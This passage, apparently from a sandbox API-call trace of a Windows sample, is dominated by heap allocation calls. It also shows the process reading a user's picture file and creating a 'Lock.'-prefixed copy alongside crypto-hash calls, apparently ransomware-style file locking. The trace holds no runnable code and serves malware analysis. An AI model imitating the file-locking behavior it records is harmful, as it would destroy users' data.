Flags=0x0, Size=0x10) returned 0x2aab440 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74668 [0212.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0212.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0212.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab080 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0212.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1b8 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab278 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1d0 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0212.100] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab200 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854d28 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.100] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f6e80 [0212.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6e80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0212.101] CryptDestroyHash (hHash=0x9e2078) returned 1 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a73dc8 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0212.101] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/yyplXweR.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yyplxwer.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0212.102] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.102] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0212.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71a0 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0212.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0212.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854650 [0212.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.103] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0212.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854650 | out: hHeap=0x2af0000) returned 1 [0212.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a930 [0212.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0212.104] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.yyplXweR.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.yyplxwer.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0212.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0212.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0212.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0212.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0212.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0212.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0212.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e8020 [0212.109] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0212.109] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0xe4ac, lpOverlapped=0x0) returned 1 [0212.112] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0212.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0212.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe4ac) returned 0x2a8a938 [0212.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e8020 | out: hHeap=0x2af0000) returned 1 [0212.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0212.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0212.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe4ac) returned 0x2aae878 [0212.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a938 | out: hHeap=0x2af0000) returned 1 [0212.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0212.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe4ac) returned 0x2a8a938 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a938 | out: hHeap=0x2af0000) returned 1 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0212.118] 